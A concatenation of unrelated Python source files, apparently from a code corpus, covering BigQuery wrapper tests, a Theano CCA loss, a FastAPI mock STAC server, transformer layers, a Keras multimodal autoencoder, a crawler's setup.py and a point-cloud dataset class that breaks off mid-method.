, gender , year , name , number') def test_buildColumnList_5(self): # Test with partition pseudo column c = self.columns c['partition_date'] = multicorn.ColumnDefinition( column_name='partition_date', type_oid=0, base_type_name='date') self.assertEqual(self.fdw.buildColumnList( c), 'state as state, gender as gender, year as year, name as name, number as number, _PARTITIONTIME as partition_date') def test_buildColumnList_6(self): # Test with partition pseudo column c = self.columns c['partition_date'] = multicorn.ColumnDefinition( column_name='partition_date', type_oid=0, base_type_name='date') self.assertEqual(self.fdw.buildColumnList( c, 'GROUP_BY'), 'state , gender , year , name , number , _PARTITIONTIME') def test_buildColumnList_7(self): # Test with a datetime c = self.columns c['datetime'] = multicorn.ColumnDefinition( column_name='datetime', type_oid=0, base_type_name='timestamp without time zone') self.assertEqual(self.fdw.buildColumnList( c, 'GROUP_BY'), 'state , gender , year , name , number , datetime') def test_buildColumnList_8(self): # Test `SELECT *` self.assertEqual(self.fdw.buildColumnList(None), '*') def test_buildColumnList_9(self): # Test no columns when grouping by self.assertEqual(self.fdw.buildColumnList(None, 'GROUP_BY'), '') def test_setTimeZone(self): self.fdw.convertToTz = 'US/Eastern' self.assertEqual(self.fdw.setTimeZone( 'column1', 'DATE').strip(), 'DATE(column1, "US/Eastern")') def test_setTimeZone_2(self): self.fdw.convertToTz = 'US/Eastern' self.assertEqual(self.fdw.setTimeZone( 'column1', 'DATETIME').strip(), 'DATETIME(column1, "US/Eastern")') def test_setTimeZone_3(self): self.fdw.convertToTz = None self.assertEqual(self.fdw.setTimeZone( 'column1', 'DATE').strip(), 'column1') def test_setTimeZone_4(self): self.fdw.convertToTz = None self.assertEqual(self.fdw.setTimeZone( 'column1', 'DATETIME').strip(), 'column1') def test_castColumn(self): # Options are a dict casted as a string casting = '{"number": "STRING"}' self.fdw.setOptionCasting(casting) self.assertEqual(self.fdw.castColumn( 'number', 'number', 'INT64'), 'CAST(number as STRING)') def test_castColumn_2(self): # Options are a dict casted as a string casting = '{"number": "STRING"}' self.fdw.setOptionCasting(casting) # Casting should fail on columns not in the casting rules self.assertEqual(self.fdw.castColumn( 'year', 'year', 'INT64'), 'year') def test_castColumn_3(self): # Options are a dict casted as a string casting = '{"number": "SOME_INVALID_TYPE"}' self.fdw.setOptionCasting(casting) # Casting should fail on invalid types self.assertEqual(self.fdw.castColumn( 'number', 'number', 'INT64'), 'number') def test_castColumn_4(self): # Options are a dict casted as a string casting = '{"number": "STRING"}' self.fdw.setOptionCasting(casting) # Casting should fail on invalid types self.assertEqual(self.fdw.castColumn( 'number', 'number', 'SOME_INVALID_TYPE'), 'number') def test_addColumnAlias(self): self.assertEqual(self.fdw.addColumnAlias( 'some_column'), ' as some_column') def test_addColumnAlias_2(self): self.assertEqual(self.fdw.addColumnAlias( 'some_column', False), '') def test_buildWhereClause(self): self.fdw.bq = self.fdw.getClient() clause, parameters = self.fdw.buildWhereClause(self.quals) self.assertIsInstance(clause, str) self.assertIsInstance(parameters, list) for parameter in parameters: self.assertIsInstance( parameter, bigquery.query.ScalarQueryParameter) def test_buildWhereClause_2(self): # Test with partition pseudo column q = self.quals 
q.append(multicorn.Qual(field_name='partition_date', operator='=', value=datetime.datetime(2018, 5, 27, 19, 53, 42).date())) self.fdw.bq = self.fdw.getClient() clause, parameters = self.fdw.buildWhereClause(q) self.assertIsInstance(clause, str) self.assertIsInstance(parameters, list) for parameter in parameters: self.assertIsInstance( parameter, bigquery.query.ScalarQueryParameter) def test_buildWhereClause_3(self): # Test with no quals self.fdw.bq = self.fdw.getClient() clause, parameters = self.fdw.buildWhereClause(None) self.assertIsInstance(clause, str) self.assertEqual(clause, '') self.assertIsInstance(parameters, list) self.assertEqual(parameters, []) def test_getOperator(self): self.assertEqual(self.fdw.getOperator('='), '=') def test_getOperator_2(self): self.assertEqual(self.fdw.getOperator('~~'), 'LIKE') def test_getOperator_3(self): self.assertEqual(self.fdw.getOperator('!~~'), 'NOT LIKE') def test_getOperator_4(self): # Test an invalid operator, should return `None` and call log_to_postgres() self.assertIsNone(self.fdw.getOperator('**')) def test_getBigQueryDatatype(self): self.assertEqual(self.fdw.getBigQueryDatatype('number'), 'INT64') def test_getBigQueryDatatype_2(self): self.assertEqual(self.fdw.getBigQueryDatatype( 'number', 'legacy'), 'INTEGER') def test_getBigQueryDatatype_3(self): # Test with a column that has an invalid type c = self.columns c['some_column'] = multicorn.ColumnDefinition( column_name='some_column', type_oid=0, base_type_name='invalid_type') self.fdw.columns = c # Should default to `STRING` self.assertEqual(self.fdw.getBigQueryDatatype('some_column'), 'STRING') def test_setParameter(self): self.fdw.bq = self.fdw.getClient() self.assertIsInstance(self.fdw.setParameter( 'column', 'STRING', 'some string'), bigquery.query.ScalarQueryParameter)
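# Hypothetical invocation sketch (not part of the original module): these tests
# talk to live BigQuery, so they assume Multicorn is installed and that
# GOOGLE_APPLICATION_CREDENTIALS points at a service account with BigQuery access.
#
#   python -m unittest discover -s tests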
440330
import theano
import theano.tensor as T
import numpy as np
from theano.tensor.slinalg import eigvalsh


def mcca_loss(N, r1=1e-4, gamma=0.1):
    '''
    N - number of modalities (>2)
    D - dimension of each modality
    r1, gamma - regularization constants; these were referenced but left
    undefined in the original, so the defaults here are assumptions
    main loss is wrapped into this function
    '''
    def inner_mcca_objective(y_true, y_pred):
        D = y_pred.shape[1] // N
        modality_range = [(D * i, (i + 1) * D) for i in range(N)]
        m = y_pred.shape[0]

        # Center the stacked data and build the within-modality covariance
        Xbar = y_pred.T - (1.0 / m) * T.dot(y_pred.T, T.ones([m, m]))
        X_Rw = (1.0 / (m - 1)) * T.dot(Xbar, Xbar.T)

        Rw_ = T.zeros([D, D])
        Xsum = T.zeros([D, m])
        for i, j in modality_range:
            Rw_ = Rw_ + X_Rw[i:j, i:j]
            Xsum = Xsum + y_pred.T[i:j, :]

        Xmean = Xsum / N

        # Total covariance of the modality mean, then between-modality covariance
        Xmean_bar = Xmean - (1.0 / m) * T.dot(Xmean, T.ones([m, m]))
        Rt_ = ((N * N * 1.0) / (m - 1)) * T.dot(Xmean_bar, Xmean_bar.T)
        Rb_ = (Rt_ - Rw_) / (N - 1)

        # Simple ridge regularization, then shrinkage (gamma) toward the scaled identity
        Rw_ = Rw_ + r1 * T.eye(D)
        Rw_reg_ = ((1 - gamma) * Rw_) + (gamma * (Rw_.diagonal().mean()) * T.eye(D))

        # Generalized eigenvalues of (Rb_, Rw_reg_); kept from the original but
        # unused below, where the problem is re-solved via Cholesky instead
        ISC_ = eigvalsh(Rb_, Rw_reg_)

        # Cholesky factorization to turn the generalized eigenproblem into a
        # standard symmetric one
        L = T.slinalg.cholesky(Rw_reg_)
        C_ = T.dot(T.nlinalg.matrix_inverse(L), Rb_)
        C = T.dot(C_, T.nlinalg.matrix_inverse(L).T)
        C_eigval, C_eigvec = T.nlinalg.eig(C)
        indx_ = T.argsort(C_eigval)[::-1]
        W_ = T.dot(T.nlinalg.matrix_inverse(L).T, C_eigvec)[:, indx_]
        d_ = T.diag(1.0 / T.sqrt((W_ * W_).sum(axis=0)))
        W_ = T.dot(W_, d_)

        # Recompute the inter-set correlations with the normalized projections
        ISC = T.diag(T.dot(T.dot(W_.T, Rb_), W_)) / T.diag(T.dot(T.dot(W_.T, Rw_), W_))
        corr = T.sqrt(T.sum(ISC * ISC))  # alternative objective: return -corr
        return -1 * ISC[0]

    return inner_mcca_objective
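# Minimal usage sketch (an assumption, not from the original file): compile the
# objective with symbolic inputs and evaluate it on random data, with N=3
# modalities of dimension D=4 stacked column-wise as the loss expects.
if __name__ == "__main__":
    y_true_sym = T.matrix("y_true")  # unused by the objective; kept for the Keras-style signature
    y_pred_sym = T.matrix("y_pred")
    loss = mcca_loss(3)(y_true_sym, y_pred_sym)
    f = theano.function([y_true_sym, y_pred_sym], loss)
    data = np.random.randn(100, 12).astype(theano.config.floatX)
    print(f(data, data))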
440333
import json
from pathlib import Path

from fastapi import FastAPI, Request
from fastapi.middleware.cors import CORSMiddleware
from fastapi.responses import RedirectResponse

app = FastAPI()
app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],
    allow_methods=["*"],
    allow_headers=["*"],
)


@app.get("/")
def read_root():
    return "Planetary Computer: Mock Edition™"


@app.get("/api/stac/v1/search")
def search(request: Request):
    print(request.query_params)
    return RedirectResponse(
        "https://planetarycomputer-staging.microsoft.com/api/stac/v1/search/?"
        + str(request.query_params)
    )


@app.get("/api/stac/v1/collections")
def static_collections():
    response = {
        "links": [
            {
                "href": "https://planetarycomputer.microsoft.com/api/stac/v1/collections",
                "rel": "self",
                "type": "application/json"
            }
        ],
        "collections": [],
    }
    for path in Path("../data").glob("*.json"):
        with open(path) as f:
            response["collections"].append(json.load(f))
    return response


# Renamed from `static_collections`, which shadowed the handler above
@app.get("/api/stac/v1/collections/{collection_id}/queryables")
def static_queryables(collection_id: str):
    with open(f"../data/{collection_id}/queryables.json") as f:
        return json.load(f)
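# Usage sketch (assumptions: the module is saved as main.py and ../data holds
# the collection JSON files):
#
#   uvicorn main:app --reload --port 8000
#   curl "http://localhost:8000/api/stac/v1/collections"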
440374
import torch
import torch.nn as nn

from Sublayers import FeedForward, MultiHeadAttention, Norm


class EncoderLayer(nn.Module):
    def __init__(self, d_model, heads, dropout=0.1):
        super().__init__()
        self.norm_1 = Norm(d_model)
        self.norm_2 = Norm(d_model)
        self.attn = MultiHeadAttention(heads, d_model, dropout=dropout)
        self.ff = FeedForward(d_model, dropout=dropout)
        self.dropout_1 = nn.Dropout(dropout)
        self.dropout_2 = nn.Dropout(dropout)

    def forward(self, x, mask):
        # Pre-norm self-attention with a residual connection
        x2 = self.norm_1(x)
        attn, concat_attn = self.attn(x2, x2, x2, mask)
        x = x + self.dropout_1(attn)
        # Pre-norm feed-forward with a residual connection
        x2 = self.norm_2(x)
        x = x + self.dropout_2(self.ff(x2))
        return x, concat_attn


# build a decoder layer with two multi-head attention layers and
# one feed-forward layer
class DecoderLayer(nn.Module):
    def __init__(self, opt, d_model, heads, dropout=0.1):
        super().__init__()
        self.use_cond2dec = opt.use_cond2dec
        self.use_cond2lat = opt.use_cond2lat
        self.norm_1 = Norm(d_model)
        self.norm_2 = Norm(d_model)
        self.norm_3 = Norm(d_model)

        self.dropout_1 = nn.Dropout(dropout)
        self.dropout_2 = nn.Dropout(dropout)
        self.dropout_3 = nn.Dropout(dropout)

        self.attn_1 = MultiHeadAttention(heads, d_model, dropout=dropout)
        self.attn_2 = MultiHeadAttention(heads, d_model, dropout=dropout)
        self.ff = FeedForward(d_model, dropout=dropout)

    def forward(self, x, e_outputs, cond_input, src_mask, trg_mask):
        # Masked self-attention over the target sequence
        x2 = self.norm_1(x)
        attn_1, concat_attn_1 = self.attn_1(x2, x2, x2, trg_mask)
        x = x + self.dropout_1(attn_1)
        x2 = self.norm_2(x)
        if self.use_cond2lat:
            # Prepend an all-True mask for the condition tokens
            cond_mask = torch.unsqueeze(cond_input, -2)
            cond_mask = torch.ones_like(cond_mask, dtype=bool)
            src_mask = torch.cat([cond_mask, src_mask], dim=2)
        # Cross-attention over the encoder outputs
        attn_2, concat_attn_2 = self.attn_2(x2, e_outputs, e_outputs, src_mask)
        x = x + self.dropout_2(attn_2)
        x2 = self.norm_3(x)
        x = x + self.dropout_3(self.ff(x2))
        return x, concat_attn_1, concat_attn_2
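# Smoke-test sketch (assumptions: the local Sublayers module is importable,
# MultiHeadAttention returns an (output, attention_weights) pair as unpacked
# above, and the mask shape is a guess at that module's convention).
if __name__ == "__main__":
    layer = EncoderLayer(d_model=64, heads=4)
    x = torch.randn(2, 10, 64)                     # (batch, seq_len, d_model)
    mask = torch.ones(2, 1, 10, dtype=torch.bool)  # attend to every position
    out, attn = layer(x, mask)
    print(out.shape)  # expected: torch.Size([2, 10, 64])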
440401
import streamlit as st

IMAGE_URL = "https://images.unsplash.com/photo-1548407260-da850faa41e3?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=1487&q=80"

st.image(IMAGE_URL, caption="Sunrise by the mountains")

st.write(
    """
    #### Image credit:

    Creator: User _<NAME> (@neil_ingham)_ from _Unsplash_

    License: Do whatever you want.
    https://unsplash.com/license

    URL: https://unsplash.com/photos/I2UR7wEftf4
    """
)
440402
import torch.nn as nn


class Model_FS(nn.Module):
    def __init__(self, basic_net):
        super(Model_FS, self).__init__()
        self.basic_net = basic_net
        self.basic_net.eval()

    def forward(self, inputs):
        outputs, _ = self.basic_net(inputs)
        return outputs
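# Usage sketch (assumption: `basic_net` is any module returning an
# (outputs, aux) pair, which is why forward() discards the second element):
#
#   wrapped = Model_FS(basic_net)
#   logits = wrapped(images)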
440438
from enum import Enum


class ParameterLocation(str, Enum):
    """The places Parameters can be put when calling an Endpoint"""

    QUERY = "query"
    PATH = "path"
    HEADER = "header"
    COOKIE = "cookie"
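# Usage note: because the enum also subclasses str, members compare equal to
# their literal values and round-trip cleanly from spec strings, e.g.
#   ParameterLocation.QUERY == "query"                         # True
#   ParameterLocation("header") is ParameterLocation.HEADER    # True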
440441
import sklearn
from sklearn.feature_selection import RFE
from sklearn.feature_selection import VarianceThreshold
from sklearn.svm import SVR
import textwrap
import argparse
import multiprocessing
import pandas as pd
import numpy as np
import h5py
import os, tqdm, pdb
from itertools import product
# from feature_selector import FeatureSelector

print(sklearn.__version__)

features = ['base_q', 'length', 'mean', 'med', 'sd']


def get_chunk_size(M, N):
    assert all(type(x) is int for x in [M, N]) and M > N > 0, "Please enter two positive integers and M>N"
    return np.array([(M // N) + 1] * (M % N) + [M // N] * (N - (M % N)))


def single_file(file_fn, folder_fn, progressbar):
    with h5py.File(os.path.join(folder_fn, file_fn[0]), 'r') as h5:
        # 15-point window centered on position 10 for each signal feature
        res = np.vstack([h5[key][10 - 7:11 + 7] for key in features]).flatten()
        base = "".join(["ATCG"[np.argmax(x)] for x in h5['motif'][:].reshape(4, -1).T[10 - 7:11 + 7]])
    progressbar.update(1)
    result = pd.Series(np.append(res, int(file_fn[0].split('_')[0])), dtype=object).append(pd.Series(base))
    return result


def worker(df, folder_fn, pid, q):
    progressbar = tqdm.tqdm(total=df.shape[0], desc='progress ' + str(pid), position=pid)
    result = df.apply(single_file, args=(folder_fn, progressbar), axis=1)
    q.put(result)
    return None


def Extract(args):
    print("start extract features")
    all_files = pd.read_csv(args.s, header=None)
    chunks = get_chunk_size(all_files.shape[0], args.p)
    with multiprocessing.Pool(processes=args.p) as pool:
        index = 0
        pid = 1
        q = multiprocessing.Manager().Queue()
        for i in chunks:
            w = pool.apply_async(worker, (all_files.iloc[index:index + i, :], args.i, pid, q))
            index += i
            pid += 1
        pool.close()
        pool.join()
    header_df = pd.DataFrame(columns=[str(f) + "_" + str(p) for f in features for p in list(range(-7, 8))] + ["label"] + ['motif'])
    header_df.to_csv(args.o, sep="\t", index=0)
    for i in range(q.qsize()):
        values = q.get()
        values.to_csv(args.o, mode='a', sep="\t", index=0, header=0)


if __name__ == "__main__":
    description = textwrap.dedent("""
    This script is a program to select best-n features of dataset
    We recommend that you execute the following sub-commands in order:

        Extract     Extract RNN features from dataset
        Filter      Remove features with low variance
        RFE         SVM-RFE algorithm is used to select the best features
        lightGBM

    See 'python ./main.py {sub-command} -h' to read about a options details.
    """)

    parser = argparse.ArgumentParser(
        description=description,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    subparsers = parser.add_subparsers(title="Sub-command", dest='command')

    parser_a = subparsers.add_parser('Extract', formatter_class=argparse.RawDescriptionHelpFormatter,
                                     help='Extract RNN features from dataset')
    parser_a.add_argument('-s', required=True, default=None,
                          help=("txt file contains names of valid dataset files"))
    parser_a.add_argument('-i', required=True, default=None,
                          help=("Abs path of valid dataset(*.hdf5)"))
    # type=int added: get_chunk_size() asserts on int inputs, and argparse
    # passes strings by default
    parser_a.add_argument('-p', type=int, default=32,
                          help=("number of core used"))
    parser_a.add_argument('-o', default='./RNN_features.txt',
                          help=("output file"))
    parser_a.set_defaults(func=Extract)

    args = parser.parse_args()
    args.func(args)

    # parser.add_argument('-m', '--model', default='SVM-RFE',
    #                     help=("Algorithms used to select features"))
    # parser.add_argument('-v', '--VarianceThreshold', default=0.8,
    #                     help=("Remove features with low variance or not(set 0)"))
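# Hypothetical invocation sketch (paths are placeholders):
#
#   python main.py Extract -s valid_files.txt -i /abs/path/to/hdf5_dir -p 8 -o RNN_features.txt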
440455
import os
import numpy as np
from keras import metrics
from keras import backend as K
from keras.models import Model
from keras.layers import Input, Dense, Concatenate
from keras.callbacks import CSVLogger, ModelCheckpoint
from keras.utils import plot_model
from src.model.autoencoder import AutoEncoder


class AutoEncoderMultimodal(AutoEncoder):
    """
    Multimodal Deep Denoising Autoencoder (DDAE) to encode audio-visual data
    ---
    Attributes
    -----------
    name: str
        model name
    dimension_A/V1/V2/V3/V4: int
        input A/V data dimensionality
    noisy: bool
        whether or not to involve denoising fashion
    sparse: bool
        whether or not to involve sparsity
    decoder_A/V1/V2/V3/V4: keras.models.Model
        keras Model mapping latent representation to A/V input
    ---------------------------------------
    Functions
    -----------
    build_model(): public
        build multimodal deep denoising autoencoder model
    train_model(): public
        train multimodal deep denoising autoencoder model
    encode(): public
        encode A/V input to latent representation
    decode(): public
        decode latent representation to A/V input
    """
    def __init__(self, name, input_dim_A, input_dim_V1, input_dim_V2, input_dim_V3, input_dim_V4, noisy=True, sparse=False):
        # NOTE: the original passed only A+V1+V2+V3 to the base class; V4 is
        # included here so the total matches dimension_A + dimension_V below
        AutoEncoder.__init__(self, name,
                             input_dim_A + input_dim_V1 + input_dim_V2 + input_dim_V3 + input_dim_V4,
                             noisy=noisy, sparse=sparse)
        self.load_basic()
        self.name = '%s_hidden%.2f_batch%d_epoch%d_noise%s' % (name, self.hidden_ratio, self.batch_size, self.epochs, self.noise)
        self.dimension_A = input_dim_A
        self.dimension_V = input_dim_V1 + input_dim_V2 + input_dim_V3 + input_dim_V4
        self.dimension_V1 = input_dim_V1
        self.dimension_V2 = input_dim_V2
        self.dimension_V3 = input_dim_V3
        self.dimension_V4 = input_dim_V4
        self.decoder_A = None
        self.decoder_V1 = None
        self.decoder_V2 = None
        self.decoder_V3 = None
        self.decoder_V4 = None

    def build_model(self):
        if not os.path.isdir(os.path.join(self.save_dir, self.name)):
            os.mkdir(os.path.join(self.save_dir, self.name))
            self.fitted = False
        else:
            self.fitted = True

        if self.hidden_ratio != 1.0:
            hidden_dim_A = int(self.dimension_A * self.hidden_ratio)
            hidden_dim_V1 = int(self.dimension_V1 * self.hidden_ratio)
            hidden_dim_V2 = int(self.dimension_V2 * self.hidden_ratio)
            hidden_dim_V3 = int(self.dimension_V3 * self.hidden_ratio)
            hidden_dim_V4 = int(self.dimension_V4 * self.hidden_ratio)
            hidden_dim = int((self.dimension_A + self.dimension_V) * self.hidden_ratio / 4)
        else:
            hidden_dim_A = int(self.dimension_A * 0.75)
            hidden_dim_V1 = int(self.dimension_V1 * 0.75)
            hidden_dim_V2 = int(self.dimension_V2 * 0.75)
            hidden_dim_V3 = int(self.dimension_V3 * 0.75)
            hidden_dim_V4 = int(self.dimension_V4 * 0.75)
            hidden_dim = int((self.dimension_A + self.dimension_V) * 0.5)

        input_data_A = Input(shape=(self.dimension_A, ), name='audio_input')
        input_data_V1 = Input(shape=(self.dimension_V1, ), name='facial_input')
        input_data_V2 = Input(shape=(self.dimension_V2, ), name='gaze_input')
        input_data_V3 = Input(shape=(self.dimension_V3, ), name='pose_input')
        input_data_V4 = Input(shape=(self.dimension_V4, ), name='action_input')
        encoded_input = Input(shape=(hidden_dim, ))

        encoded_A = Dense(hidden_dim_A, activation='relu', kernel_initializer='he_uniform', name='audio_encoded')(input_data_A)
        encoded_V1 = Dense(hidden_dim_V1, activation='relu', kernel_initializer='he_uniform', name='facial_encoded')(input_data_V1)
        encoded_V2 = Dense(hidden_dim_V2, activation='relu', kernel_initializer='he_uniform', name='gaze_encoded')(input_data_V2)
        encoded_V3 = Dense(hidden_dim_V3, activation='relu', kernel_initializer='he_uniform', name='pose_encoded')(input_data_V3)
        encoded_V4 = Dense(hidden_dim_V4, activation='relu', kernel_initializer='he_uniform', name='action_encoded')(input_data_V4)

        shared = Concatenate(axis=1, name='concat')([encoded_A, encoded_V1, encoded_V2, encoded_V3, encoded_V4])

        if self.sparse:
            encoded = Dense(hidden_dim, activation='relu',
                            activity_regularizer=self.sparse_regularizer,
                            name='shared_repres')(shared)
        else:
            encoded = Dense(hidden_dim, activation='relu',
                            name='shared_repres')(shared)

        decoded_A = Dense(hidden_dim_A, activation='relu', name='audio_decoded')(encoded)
        decoded_V1 = Dense(hidden_dim_V1, activation='relu', name='facial_decoded')(encoded)
        decoded_V2 = Dense(hidden_dim_V2, activation='relu', name='gaze_decoded')(encoded)
        decoded_V3 = Dense(hidden_dim_V3, activation='relu', name='pose_decoded')(encoded)
        decoded_V4 = Dense(hidden_dim_V4, activation='relu', name='action_decoded')(encoded)

        decoded_A = Dense(self.dimension_A, activation='linear', name='audio_recon')(decoded_A)
        decoded_V1 = Dense(self.dimension_V1, activation='linear', name='facial_recon')(decoded_V1)
        decoded_V2 = Dense(self.dimension_V2, activation='linear', name='gaze_recon')(decoded_V2)
        decoded_V3 = Dense(self.dimension_V3, activation='linear', name='pose_recon')(decoded_V3)
        decoded_V4 = Dense(self.dimension_V4, activation='linear', name='action_recon')(decoded_V4)

        self.autoencoder = Model(inputs=[input_data_A, input_data_V1, input_data_V2, input_data_V3, input_data_V4],
                                 outputs=[decoded_A, decoded_V1, decoded_V2, decoded_V3, decoded_V4])
        self.encoder = Model(inputs=[input_data_A, input_data_V1, input_data_V2, input_data_V3, input_data_V4],
                             outputs=encoded)
        self.decoder_A = Model(inputs=encoded_input,
                               outputs=self.autoencoder.get_layer('audio_recon')(
                                   self.autoencoder.get_layer('audio_decoded')(
                                       encoded_input)))
        self.decoder_V1 = Model(inputs=encoded_input,
                                outputs=self.autoencoder.get_layer('facial_recon')(
                                    self.autoencoder.get_layer('facial_decoded')(
                                        encoded_input)))
        self.decoder_V2 = Model(inputs=encoded_input,
                                outputs=self.autoencoder.get_layer('gaze_recon')(
                                    self.autoencoder.get_layer('gaze_decoded')(
                                        encoded_input)))
        self.decoder_V3 = Model(inputs=encoded_input,
                                outputs=self.autoencoder.get_layer('pose_recon')(
                                    self.autoencoder.get_layer('pose_decoded')(
                                        encoded_input)))
        self.decoder_V4 = Model(inputs=encoded_input,
                                outputs=self.autoencoder.get_layer('action_recon')(
                                    self.autoencoder.get_layer('action_decoded')(
                                        encoded_input)))

        # configure model
        # two combos: ['adam' + 'mse'] or ['adadelta' + 'binary_crossentropy']
        self.autoencoder.compile(optimizer='adam', loss='mse',
                                 metrics=[metrics.mse, metrics.mse, metrics.mse, metrics.mse, metrics.mse],
                                 loss_weights=[0.35, 0.35, 0.1, 0.1, 0.1])

        print("--" * 20)
        print("autoencoder")
        print(self.autoencoder.summary())
        print("--" * 20)
        print("encoder")
        print(self.encoder.summary())
        print("--" * 20)
        print("decoder (A)")
        print(self.decoder_A.summary())
        print("--" * 20)
        plot_model(self.autoencoder, show_shapes=True,
                   to_file=os.path.join(self.save_dir, self.name, 'multimodal_DDAE.png'))

    def train_model(self, X_train_A, X_train_V, X_dev_A, X_dev_V):
        if self.fitted:
            print("\nmodel already trained ---", self.name)
            self.load_model()
            return

        X_train_V1, X_train_V2, X_train_V3, X_train_V4 = self.separate_V(X_train_V)
        X_dev_V1, X_dev_V2, X_dev_V3, X_dev_V4 = self.separate_V(X_dev_V)

        X_train_A = np.vstack((X_train_A, X_dev_A))
        X_train_V1 = np.vstack((X_train_V1, X_dev_V1))
        X_train_V2 = np.vstack((X_train_V2, X_dev_V2))
        X_train_V3 = np.vstack((X_train_V3, X_dev_V3))
        X_train_V4 = np.vstack((X_train_V4, X_dev_V4))

        if self.noisy:
            X_train_A_noisy = self.add_noise(X_train_A, self.noise)
            X_train_V1_noisy = self.add_noise(X_train_V1, self.noise)
            X_train_V2_noisy = self.add_noise(X_train_V2, self.noise)
            X_train_V3_noisy = self.add_noise(X_train_V3, self.noise)
            X_train_V4_noisy = self.add_noise(X_train_V4, self.noise)
        else:
            X_train_A_noisy = X_train_A
            X_train_V1_noisy = X_train_V1
            X_train_V2_noisy = X_train_V2
            X_train_V3_noisy = X_train_V3
            X_train_V4_noisy = X_train_V4

        assert X_train_A_noisy.shape == X_train_A.shape
        assert X_train_V1_noisy.shape == X_train_V1.shape
        assert X_train_V2_noisy.shape == X_train_V2.shape
        assert X_train_V3_noisy.shape == X_train_V3.shape
        assert X_train_V4_noisy.shape == X_train_V4.shape

        csv_logger = CSVLogger(os.path.join(self.save_dir, self.name, "logger.csv"))
        checkpoint = ModelCheckpoint(os.path.join(self.save_dir, self.name,
                                                  "weights-improvement-{epoch:02d}-{loss:.2f}.hdf5"),
                                     monitor='loss', verbose=1, save_best_only=True, mode='min')
        callbacks_list = [csv_logger, checkpoint]

        self.autoencoder.fit([X_train_A_noisy, X_train_V1_noisy, X_train_V2_noisy, X_train_V3_noisy, X_train_V4_noisy],
                             [X_train_A, X_train_V1, X_train_V2, X_train_V3, X_train_V4],
                             epochs=self.epochs,
                             batch_size=self.batch_size,
                             shuffle=True,
                             callbacks=callbacks_list)

        print("\nmodel trained and saved ---", self.name)
        self.save_model()

    def encode(self, X_train_A, X_train_V, X_dev_A, X_dev_V):
        """encode multimodal input to latent representation
        """
        X_1_V1, X_1_V2, X_1_V3, X_1_V4 = self.separate_V(X_train_V)
        X_2_V1, X_2_V2, X_2_V3, X_2_V4 = self.separate_V(X_dev_V)
        encoded_train = self.encoder.predict([X_train_A, X_1_V1, X_1_V2, X_1_V3, X_1_V4])
        encoded_dev = self.encoder.predict([X_dev_A, X_2_V1, X_2_V2, X_2_V3, X_2_V4])
        self.save_representation(encoded_train, encoded_dev)
        self.decode(encoded_train, encoded_dev)

    def decode(self, encoded_train, encoded_dev):
        """decode latent representation to multimodal input
        """
        decoded_train_A = self.decoder_A.predict(encoded_train)
        decoded_dev_A = self.decoder_A.predict(encoded_dev)
        self.save_reconstruction(decoded_train_A, decoded_dev_A, modality=True, no_modality=0)
        decoded_train_V1 = self.decoder_V1.predict(encoded_train)
        decoded_dev_V1 = self.decoder_V1.predict(encoded_dev)
        self.save_reconstruction(decoded_train_V1, decoded_dev_V1, modality=True, no_modality=1)
        decoded_train_V2 = self.decoder_V2.predict(encoded_train)
        decoded_dev_V2 = self.decoder_V2.predict(encoded_dev)
        self.save_reconstruction(decoded_train_V2, decoded_dev_V2, modality=True, no_modality=2)
        decoded_train_V3 = self.decoder_V3.predict(encoded_train)
        decoded_dev_V3 = self.decoder_V3.predict(encoded_dev)
        self.save_reconstruction(decoded_train_V3, decoded_dev_V3, modality=True, no_modality=3)
        decoded_train_V4 = self.decoder_V4.predict(encoded_train)
        decoded_dev_V4 = self.decoder_V4.predict(encoded_dev)
        # fixed: the original saved the V1 reconstruction again for modality 4
        self.save_reconstruction(decoded_train_V4, decoded_dev_V4, modality=True, no_modality=4)
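# Usage sketch (assumptions: the AutoEncoder base class supplies load_basic(),
# separate_V(), add_noise(), save_model() and friends, and X_*_V stacks the
# V1..V4 feature blocks column-wise as separate_V() expects):
#
#   ae = AutoEncoderMultimodal('demo', 30, 20, 10, 10, 10)
#   ae.build_model()
#   ae.train_model(X_train_A, X_train_V, X_dev_A, X_dev_V)
#   ae.encode(X_train_A, X_train_V, X_dev_A, X_dev_V)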
440459
from distutils.core import setup
from setuptools import find_packages

setup(
    name='Amipy',
    version='1.0.0',
    url='https://github.com/01ly/Amipy',
    description='A micro asynchronous Python website crawler framework',
    # long_description=open('README.md').read(),
    author='linkin',
    maintainer='linkin',
    maintainer_email='<EMAIL> ',
    license='MIT',
    packages=find_packages(exclude=('tests', 'tests.*')),
    include_package_data=True,
    zip_safe=False,
    entry_points={
        'console_scripts': ['amipy = amipy.cmd:run']
    },
    install_requires=[
        'lxml',
        'bs4',
        'six>=1.5.2',
        'bloompy>=0.1.1',
    ],
    classifiers=[
        'Environment :: Console',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Topic :: Internet :: WWW/HTTP',
        'Topic :: Software Development :: Libraries :: Application Frameworks',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ],
    python_requires='>=3.5',
)
440496
import os

import numpy as np

import data_utils

BASE_DIR = os.path.dirname(os.path.abspath(__file__))


class PartDatasetPCN:
    def __init__(self, root, npoints=400, class_choice='Chair', split='train'):
        self.npoints = npoints
        self.cache = {}  # caching the loaded parts
        cat, meta = data_utils.data_parse(os.path.join(root, 'synsetoffset2category.txt'), class_choice, root, split)
        self.datapath = []
        for item in cat:
            for fn in meta[item]:
                self.datapath.append((item, fn[0], fn[1]))
        self.num_parts = data_utils.compute_num_of_parts(self.datapath)

    def __getitem__(self, index):
        if index in self.cache:
            parts_point_sets = self.cache[index]
        else:
            point_set, seg = data_utils.get_point_set_and_seg(self.datapath, index)
            point_set = data_utils.pc_normalize(point_set)
            parts_point_sets = []
            # range: the original used Python 2's xrange
            for p in range(self.num_parts):
                part_points = np.where(seg == p)
                if len(part_points[0]) > 1:
                    part_point_set = point_set[part_points]
                    is_part_exist = True
                else:
                    part_point_set = np.zeros((self.npoints, 3))
                    is_part_exist = False
                # normalize each part on its own
                if is_part_exist:
                    norm_part_point_set = data_utils.pc_normalize(part_point_set)
                else:
                    norm_part_point_set = part_point_set
                parts_point_sets.append((part_point_set, norm_part_point_set, is_part_exist))
            self.cache[index] = parts_point_sets

        point_sets = []
        for point_set, norm_part_point_set, is_full in parts_point_sets:
            # choose the right number of points by
            # randomly picking, if there are too many,
            # or re-sampling, if there are fewer than needed
